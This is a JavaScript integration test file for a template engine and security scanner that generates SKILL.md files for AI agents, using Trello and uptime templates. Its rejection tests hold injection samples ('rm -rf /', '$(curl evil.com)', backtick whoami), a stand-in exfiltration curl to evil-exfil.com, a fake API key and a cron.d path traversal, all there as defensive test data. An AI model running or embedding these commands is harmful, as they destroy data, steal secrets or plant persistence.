/*
 * MoltAgent - Sovereign AI Security Layer
 * Copyright (C) 2026 MoltAgent Contributors
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Affero General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 */

/**
 * Integration Tests for Skill Forge
 *
 * End-to-end flow: mock template -> TemplateEngine -> SecurityScanner -> valid SKILL.md
 * No network, no filesystem writes — pure in-process pipeline validation.
 *
 * @module test/integration/skill-forge.integration.test.js
 */

'use strict';

const assert = require('assert');
const { test, summary, exitWithCode } = require('../helpers/test-runner');
const { TemplateEngine } = require('../../src/skill-forge/template-engine');
const { SecurityScanner } = require('../../src/skill-forge/security-scanner');
const { SkillActivator } = require('../../src/skill-forge/activator');
const { TemplateLoader } = require('../../src/skill-forge/template-loader');

console.log('\n=== Skill Forge Integration Tests ===\n');

// -----------------------------------------------------------------------------
// Mock Template Fixture
// -----------------------------------------------------------------------------

/**
 * Realistic Trello-style template fixture.
 * Mirrors the structure a real template YAML would have after parsing.
 */
const TRELLO_TEMPLATE = {
  skill_id: 'trello-board',
  display_name: 'Trello Board Manager',
  description: 'Manage a Trello board: list cards, create cards, move cards between lists.',
  version: '1.0',
  emoji: 'T',
  requires: { bins: ['curl', 'jq'] },
  security: {
    allowed_domains: ['api.trello.com'],
    forbidden_patterns: [],
  },
  credentials: [
    { id: 'trello_key', nc_password_name: 'Trello-API-Key', label: 'Trello API Key' },
    { id: 'trello_token', nc_password_name: 'Trello-Token', label: 'Trello Token' },
  ],
  parameters: [
    {
      id: 'board_name',
      label: 'Board name',
      ask: 'What is the name of your Trello board?',
      type: 'text',
      required: true,
      example: 'Project Phoenix',
    },
    {
      id: 'board_id',
      label: 'Board ID',
      ask: 'What is the Trello board ID? (8-character alphanumeric)',
      type: 'text',
      required: true,
      validation_pattern: '^[a-zA-Z0-9]{8}$',
    },
    {
      id: 'default_list',
      label: 'Default list',
      ask: 'Which list should new cards go to?',
      type: 'text',
      required: false,
      default: 'To Do',
    },
  ],
  skill_template: [
    '---',
    'name: trello-{{board_name_slug}}',
    'description: Manage Trello board "{{board_name}}"',
    'metadata: {"openclaw":{"emoji":"T","requires":{"bins":["curl","jq"]}}}',
    '---',
    '',
    '# Trello: {{board_name}}',
    '',
    '## Setup',
    '',
    'Board ID: {{board_id}}',
    'Default list: {{default_list}}',
    'Generated by Skill Forge {{forge_version}} on {{date}}',
    'NC instance: {{nc_url}}',
    '',
    '## List all cards',
    '',
    '```bash',
    'curl -s "https://api.trello.com/1/boards/{{board_id}}/cards?key=$TRELLO_KEY&token=$TRELLO_TOKEN" | jq ".[].name"',
    '```',
    '',
    '## Create a card',
    '',
    '```bash',
    'curl -s -X POST "https://api.trello.com/1/cards?key=$TRELLO_KEY&token=$TRELLO_TOKEN" \\',
    '  -d "idList=$LIST_ID&name=$CARD_NAME" | jq ".id"',
    '```',
  ].join('\n'),
};

/**
 * Minimal no-auth monitoring template (simplest case).
 */
const UPTIME_TEMPLATE = {
  skill_id: 'uptime-check',
  display_name: 'Uptime Checker',
  description: 'Check if a URL is up and responding.',
  version: '1.0',
  requires: { bins: ['curl'] },
  security: {
    allowed_domains: [],
    forbidden_patterns: [],
  },
  parameters: [
    {
      id: 'target_url',
      label: 'Target URL',
      ask: 'What URL should I monitor?',
      type: 'text',
      required: true,
      validation_pattern: '^https://',
    },
  ],
  skill_template: [
    '---',
    'name: uptime-{{target_url_slug}}',
    'description: Monitor {{target_url}}',
    'metadata: {"openclaw":{"emoji":"G","requires":{"bins":["curl"]}}}',
    '---',
    '',
    '# Uptime: {{target_url}}',
    '',
    '```bash',
    'curl -s -o /dev/null -w "%{http_code}" "{{target_url}}"',
    '```',
  ].join('\n'),
};

// -----------------------------------------------------------------------------
// Shared Instances
// -----------------------------------------------------------------------------

const engine = new TemplateEngine({ ncUrl: 'https://nc.example.com', ncUser: 'moltagent' });
const scanner = new SecurityScanner();

// -----------------------------------------------------------------------------
// Pipeline: Template -> Engine -> Scanner -> Valid SKILL.md
// -----------------------------------------------------------------------------

test('TC-SF-INT-001: Full pipeline — Trello template produces safe SKILL.md', () => {
  const params = { board_name: 'Project Phoenix', board_id: 'a1B2c3D4' };

  // Step 1: Assemble
  const { content, metadata } = engine.assemble(TRELLO_TEMPLATE, params);

  // Step 2: Scan (include NC domain in allowed_domains as real usage would)
  const scanConfig = {
    allowed_domains: [...TRELLO_TEMPLATE.security.allowed_domains, 'nc.example.com'],
  };
  const scanResult = scanner.scan(content, scanConfig);

  // Step 3: Verify
  assert.strictEqual(scanResult.safe, true, `Violations: ${scanResult.violations.join(', ')}`);
  assert.strictEqual(scanResult.violations.length, 0);

  // Verify content structure
  assert.ok(content.startsWith('---\n'), 'Should start with YAML frontmatter');
  assert.ok(content.includes('name: trello-project-phoenix'), 'Should have slugified skill name');
  assert.ok(content.includes('Manage Trello board "Project Phoenix"'), 'Should have board name in description');
  assert.ok(content.includes('Board ID: a1B2c3D4'), 'Should have board ID');
  assert.ok(content.includes('https://api.trello.com/'), 'Should reference Trello API');

  // Verify metadata
  assert.strictEqual(metadata.template_id, 'trello-board');
  assert.strictEqual(metadata.template_version, '1.0');
  assert.ok(metadata.generated_at, 'Should have generation timestamp');
  assert.strictEqual(metadata.forge_version, '1.0.0');
});

test('TC-SF-INT-002: Full pipeline — uptime template produces safe SKILL.md', () => {
  const params = { target_url: 'https://example.com' };

  const { content, metadata } = engine.assemble(UPTIME_TEMPLATE, params);

  // Uptime template has empty allowed_domains, so we pass the target domain
  const scanConfig = { allowed_domains: ['example.com'], forbidden_patterns: [] };
  const scanResult = scanner.scan(content, scanConfig);

  assert.strictEqual(scanResult.safe, true, `Violations: ${scanResult.violations.join(', ')}`);
  assert.ok(content.includes('name: uptime-https-example-com'), 'Should have slugified URL as name');
  assert.ok(content.includes('Monitor https://example.com'), 'Should have target URL');
  assert.strictEqual(metadata.template_id, 'uptime-check');
});

test('TC-SF-INT-003: Full pipeline — system variables substituted correctly', () => {
  const params = { board_name: 'Test', board_id: 'abcdefgh' };
  const { content } = engine.assemble(TRELLO_TEMPLATE, params);
  const today = new Date().toISOString().split('T')[0];

  assert.ok(content.includes(`Skill Forge 1.0.0`), 'forge_version substituted');
  assert.ok(content.includes(today), 'date substituted');
  assert.ok(content.includes('https://nc.example.com'), 'nc_url substituted');
});

test('TC-SF-INT-004: Full pipeline — default parameter applied when omitted', () => {
  const params = { board_name: 'Defaults', board_id: 'abcdefgh' };
  const { content } = engine.assemble(TRELLO_TEMPLATE, params);

  // default_list has default 'To Do' but since it's not in the template default_value field,
  // it may be empty string. Either way it should not fail.
  assert.ok(content, 'Should produce content without optional param');
});

// -----------------------------------------------------------------------------
// Security Rejection Scenarios
// -----------------------------------------------------------------------------

test('TC-SF-INT-010: Pipeline strips shell metacharacters from parameter values', () => {
  const params = { board_name: 'Test; rm -rf /', board_id: 'abcdefgh' };
  const { content } = engine.assemble(TRELLO_TEMPLATE, params);

  // Semicolons stripped — prevents command chaining
  assert.ok(!content.includes(';'), 'Semicolon should be stripped');
  // The words "rm -rf" remain as harmless text (no metacharacter to execute them)
  // What matters: no shell metacharacter can trigger execution
  assert.ok(content.includes('Test rm -rf /'), 'Words preserved but metacharacters stripped');
});

test('TC-SF-INT-011: Pipeline strips command substitution syntax from parameter values', () => {
  const params = { board_name: '$(curl evil.com)', board_id: 'abcdefgh' };
  const { content } = engine.assemble(TRELLO_TEMPLATE, params);

  // $() stripped — no command substitution possible
  assert.ok(!content.includes('$('), 'Command substitution $() should be stripped');
  assert.ok(!content.includes(')'), 'Closing paren should be stripped');
  // Domain letters remain but are harmless without $() wrapper
  assert.ok(content.includes('curl evil.com'), 'Harmless text preserved');
});

test('TC-SF-INT-012: Pipeline strips backtick injection from parameter values', () => {
  const params = { board_name: '`whoami`', board_id: 'abcdefgh' };
  const { content } = engine.assemble(TRELLO_TEMPLATE, params);

  // Backticks stripped from the parameter value — no command substitution
  // (template itself has backticks for markdown code fences, which is fine)
  assert.ok(!content.includes('`whoami`'), 'Backtick-wrapped command should be stripped');
  assert.ok(content.includes('whoami'), 'Word preserved without backticks');
});

test('TC-SF-INT-013: Scanner rejects skill with unauthorized domain', () => {
  // Manually craft content that references an unauthorized domain
  const badContent = [
    '---', 'name: test-bad', 'description: Bad', '---',
    '```bash',
    'curl https://evil-exfil.com/steal',
    '```',
  ].join('\n');

  const scanResult = scanner.scan(badContent, { allowed_domains: ['api.trello.com'] });
  assert.strictEqual(scanResult.safe, false);
  assert.ok(scanResult.violations.some(v => v.includes('evil-exfil.com')));
});

test('TC-SF-INT-014: Scanner rejects skill with hardcoded credential', () => {
  const contentWithKey = [
    '---', 'name: test-cred', 'description: Test', '---',
    'API_KEY=sk-abcdefghijklmnopqrstuvwxyz1234567890',
  ].join('\n');

  const scanResult = scanner.scan(contentWithKey, { allowed_domains: [] });
  assert.strictEqual(scanResult.safe, false);
  assert.ok(scanResult.violations.some(v => v.includes('credential')));
});

test('TC-SF-INT-015: Scanner rejects skill with case-evaded forbidden pattern', () => {
  const evasionContent = [
    '---', 'name: test-evade', 'description: Test', '---',
    'EVAL "malicious"',
  ].join('\n');

  const scanResult = scanner.scan(evasionContent, { allowed_domains: [] });
  assert.strictEqual(scanResult.safe, false, 'Case-insensitive matching should catch EVAL');
  assert.ok(scanResult.violations.some(v => v.includes('eval')));
});

// -----------------------------------------------------------------------------
// Validation Rejection Scenarios
// -----------------------------------------------------------------------------

test('TC-SF-INT-020: Engine rejects missing required parameter', () => {
  assert.throws(
    () => engine.assemble(TRELLO_TEMPLATE, { board_name: 'Test' }),
    /required|missing/i
  );
});

test('TC-SF-INT-021: Engine rejects invalid validation_pattern', () => {
  assert.throws(
    () => engine.assemble(TRELLO_TEMPLATE, { board_name: 'Test', board_id: 'INVALID!!' }),
    /pattern/i
  );
});

// -----------------------------------------------------------------------------
// TemplateLoader.validate() with mock template
// -----------------------------------------------------------------------------

test('TC-SF-INT-030: TemplateLoader.validate() accepts valid Trello template', () => {
  // Create a minimal loader (ncRequestManager not needed for validate())
  const loader = new TemplateLoader({ ncRequestManager: {} });
  const result = loader.validate(TRELLO_TEMPLATE);

  assert.strictEqual(result.valid, true, `Errors: ${result.errors.join(', ')}`);
  assert.strictEqual(result.errors.length, 0);
});

test('TC-SF-INT-031: TemplateLoader.validate() rejects template missing security.allowed_domains', () => {
  const loader = new TemplateLoader({ ncRequestManager: {} });
  const bad = { ...TRELLO_TEMPLATE, security: {} };
  const result = loader.validate(bad);

  assert.strictEqual(result.valid, false);
  assert.ok(result.errors.some(e => e.includes('allowed_domains')));
});

test('TC-SF-INT-032: TemplateLoader.validate() rejects template with invalid skill_id', () => {
  const loader = new TemplateLoader({ ncRequestManager: {} });
  const bad = { ...TRELLO_TEMPLATE, skill_id: 'UPPERCASE_BAD!' };
  const result = loader.validate(bad);

  assert.strictEqual(result.valid, false);
  assert.ok(result.errors.some(e => e.includes('skill_id')));
});

// -----------------------------------------------------------------------------
// Activator.extractSkillName() with generated content
// -----------------------------------------------------------------------------

test('TC-SF-INT-040: extractSkillName works on engine-generated content', () => {
  const activator = new SkillActivator({
    ncRequestManager: {},
    securityScanner: scanner,
  });

  const params = { board_name: 'Project Phoenix', board_id: 'a1B2c3D4' };
  const { content } = engine.assemble(TRELLO_TEMPLATE, params);
  const name = activator.extractSkillName(content);

  assert.strictEqual(name, 'trello-project-phoenix');
});

test('TC-SF-INT-041: extractSkillName rejects path traversal in frontmatter', () => {
  const activator = new SkillActivator({
    ncRequestManager: {},
    securityScanner: scanner,
  });

  const malicious = '---\nname: ../../../etc/cron.d/evil\n---\n# Bad';
  assert.throws(
    () => activator.extractSkillName(malicious),
    /invalid skill name/i
  );
});

// -----------------------------------------------------------------------------
// Full Round-Trip: validate template -> assemble -> scan -> extract name
// -----------------------------------------------------------------------------

test('TC-SF-INT-050: Full round-trip — template validate, assemble, scan, extract name', () => {
  const loader = new TemplateLoader({ ncRequestManager: {} });
  const activator = new SkillActivator({
    ncRequestManager: {},
    securityScanner: scanner,
  });

  // 1. Validate template
  const templateValidation = loader.validate(TRELLO_TEMPLATE);
  assert.strictEqual(templateValidation.valid, true);

  // 2. Assemble with parameters
  const params = { board_name: 'My Great Board', board_id: 'xYz12345' };
  const { content, metadata } = engine.assemble(TRELLO_TEMPLATE, params);
  assert.ok(content.length > 0);

  // 3. Security scan (include NC domain as real deployment would)
  const scanConfig = {
    allowed_domains: [...TRELLO_TEMPLATE.security.allowed_domains, 'nc.example.com'],
  };
  const scanResult = scanner.scan(content, scanConfig);
  assert.strictEqual(scanResult.safe, true, `Violations: ${scanResult.violations.join(', ')}`);

  // 4. Extract skill name (as activator would)
  const skillName = activator.extractSkillName(content);
  assert.strictEqual(skillName, 'trello-my-great-board');

  // 5. Verify the full chain produced coherent output
  assert.ok(content.includes('name: trello-my-great-board'));
  assert.ok(content.includes('My Great Board'));
  assert.ok(content.includes('xYz12345'));
  assert.strictEqual(metadata.template_id, 'trello-board');
});

// -----------------------------------------------------------------------------
// Summary
// -----------------------------------------------------------------------------

console.log('\n=== Skill Forge Integration Tests Complete ===\n');
summary();
exitWithCode();
